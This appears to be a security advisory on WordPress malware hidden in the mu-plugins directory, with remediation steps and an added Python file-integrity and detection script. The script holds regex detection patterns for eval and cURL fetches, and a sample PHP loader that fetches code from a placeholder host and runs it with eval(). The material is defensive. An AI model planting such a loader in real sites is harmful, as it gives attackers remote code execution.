March 31, 2025
Severity
High
Analysis Summary
Threat actors are increasingly targeting WordPress websites by hiding malicious code within the mu-plugins directory, a critical folder that loads automatically with WordPress. This method enables attackers to maintain persistence while evading detection, making removal significantly harder. The malware variants discovered in this directory include redirect scripts, webshells, and spam injectors, all of which appear legitimate but serve malicious purposes. These scripts can redirect users to harmful domains, provide attackers with remote code execution capabilities, or manipulate website content for malicious distribution.
Security researchers have observed that these malware strains are designed to bypass detection mechanisms. Attackers implement techniques that prevent search engine crawlers and privileged users from seeing the malicious activity, ensuring their code remains hidden while maximizing its impact. As a result, infected websites suffer severe consequences, including reputation damage, data theft, malware distribution, and unauthorized modifications. The most harmful variant allows attackers to establish persistent access, facilitating long-term control over the compromised site.
One of the most concerning discoveries is a webshell disguised as a legitimate WordPress plugin, typically placed in the wp-content/mu-plugins/index.php location. This webshell executes arbitrary PHP code fetched from a remote server using cURL and the eval() function, allowing attackers to run commands with the same privileges as the web server. Such access can lead to a complete website takeover, enabling attackers to upload files, delete content, and steal sensitive information.
The presence of these sophisticated malware variants highlights the evolving tactics of cybercriminals and the increasing difficulty of detecting and removing threats embedded within WordPress environments. Website owners must implement strict security measures, such as monitoring file integrity, restricting write permissions, and utilizing advanced security plugins to detect anomalies. Proactive defense is essential to prevent these stealthy attacks from compromising websites and impacting visitors.
Impact
- Remote Code Execution
- Privilege Escalation
- Security Bypass
Affected Vendors
- WordPress
Remediation
- Regularly scan the mu-plugins directory and other critical WordPress files for unauthorized modifications.
- Use file integrity monitoring tools (e.g., Wordfence, Sucuri, or MalCare) to detect suspicious changes.
- Set strict file permissions (644 for files and 755 for directories) to limit unauthorized modifications.
- Restrict the ability to write or modify files in wp-content/mu-plugins.
- Review the mu-plugins directory and delete any suspicious or unrecognized files.
- Reinstall WordPress core files and legitimate plugins to ensure integrity.
- Deploy a WAF (e.g., Cloudflare, Sucuri, or ModSecurity) to block malicious requests targeting WordPress.
- Restrict plugin and theme installation to administrators only.
- Regularly audit installed plugins and remove unused or outdated ones.
- Keep WordPress, themes, and plugins up to date to patch vulnerabilities exploited by attackers.
- Disable XML-RPC and restrict REST API access if not needed.
- Change default login URLs and enforce strong authentication policies.
- Use security plugins that provide real-time scanning and automatic malware removal.
- Enable alerts for suspicious activities or file changes.
- Perform routine security audits to identify vulnerabilities and potential threats.
- Maintain frequent backups of website files and databases in a secure, offsite location for quick recovery.
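The first two remediation items (baseline the mu-plugins directory, then alert on unauthorized changes) and the loader described in the analysis (remote fetch via cURL passed to eval()) can be combined into one small defender-side check. The script below is an added example written for this advisory, not code from the original page or from any vendor tool; the regular expressions are constructed heuristics, the sample plugin files are constructed, and the paths are a throwaway temporary directory rather than a real wp-content/mu-plugins.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristics for the loader pattern the advisory describes (remote fetch fed to eval);
# constructed for this example, not a vendor signature set.
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "remote_fetch": re.compile(r"\bcurl_(init|exec)\s*\(|file_get_contents\s*\(\s*['\"]https?://"),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
}

def hash_tree(root):
    """Relative path -> SHA-256 of every file under root: a file-integrity baseline."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_baseline(old, new):
    """Return (added, modified, removed) relative paths between two baselines."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return added, modified, removed

def scan_mu_plugins(root):
    """Return {relative_path: [indicator names]} for each .php file matching a heuristic."""
    hits = {}
    for php in Path(root).rglob("*.php"):
        body = php.read_text(encoding="utf-8", errors="replace")
        found = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(body))
        if found:
            hits[str(php.relative_to(root))] = found
    return hits

# Constructed samples: a benign mu-plugin and a loader shaped like the advisory's index.php.
BENIGN = "<?php\n/* Plugin Name: Site Tweaks */\nadd_filter('show_admin_bar', '__return_false');\n"
LOADER = "<?php\n$c = curl_init('http://example.invalid/p.txt');\neval(curl_exec($c));\n"

def demo():
    """Baseline a throwaway mu-plugins tree, drop the loader in, then diff and scan."""
    root = Path(tempfile.mkdtemp())
    (root / "site-tweaks.php").write_text(BENIGN)
    before = hash_tree(root)
    (root / "index.php").write_text(LOADER)
    added, modified, removed = diff_baseline(before, hash_tree(root))
    return added, modified, removed, scan_mu_plugins(root)

if __name__ == "__main__":
    print(demo())
```

In production the baseline would be stored off-host and compared on a schedule, and any hit in mu-plugins treated as an incident rather than auto-deleted, so the file can be preserved for analysis.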